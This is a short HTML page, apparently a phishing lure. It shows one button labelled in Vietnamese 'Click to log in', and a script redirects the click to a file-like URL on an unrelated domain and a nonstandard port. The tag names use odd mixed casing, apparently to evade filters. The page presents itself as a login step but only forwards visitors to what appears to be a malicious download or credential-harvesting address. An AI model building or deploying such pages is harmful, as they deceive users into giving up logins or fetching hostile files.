<!DOCTYPE html>
<html>
<HeAd>
    <Meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <Meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
    <Meta name="format-detection" content="telephone=no">
    <Meta name="apple-mobile-web-app-capable" content="yes">
    <Meta name="wap-font-scale" content="no">
    <Meta name="apple-mobile-web-app-status-bar-style" content="black">


    <style>
        body {
            margin: 0;
            font-family: 'Microsoft YaHei';
        }

        .weui-btn_primary {
            background-color: #f09972
        }

        .weui-btn {
            position: relative;
            display: block;
            margin-left: auto;
            margin-right: auto;
            padding-left: 14px;
            padding-right: 14px;
            box-sizing: border-box;
            font-size: 18px;
            text-align: center;
            text-decoration: none;
            color: #FFF;
            line-height: 2.55555556;
            border-radius: 5px;
            -webkit-tap-highlight-color: transparent;
            overflow: hidden;
            margin-bottom: 20px
        }


        .icon {
            font-size: 93px;
            margin: 20px auto
        }

        .actions {
            padding: 10px 30px
        }

    </style>
<body>

<dIV class="actions" id="goHome" style="margin-top:300px">
    <a href="#" class="weui-btn weui-btn_primary" id="gogo">Bấm vào để đăng nhập</a>
</dIV>

<script
  src="https://code.jquery.com/jquery-3.6.0.min.js"
  integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
  crossorigin="anonymous"></script>

<ScRiPt>

	$('#goHome').click(function(){
		var address = 'https://cdwfew.com:7721/g/LhCb98x5/?816.xlsx'
		window.location.href = address;
	})
</ScRiPt>


<DIv class="yformater-layer">
    <DIv class="yformater-layer-content"><i class="yformater-layer-icon"></i></DIv>
</DIv>
</body>
</html>
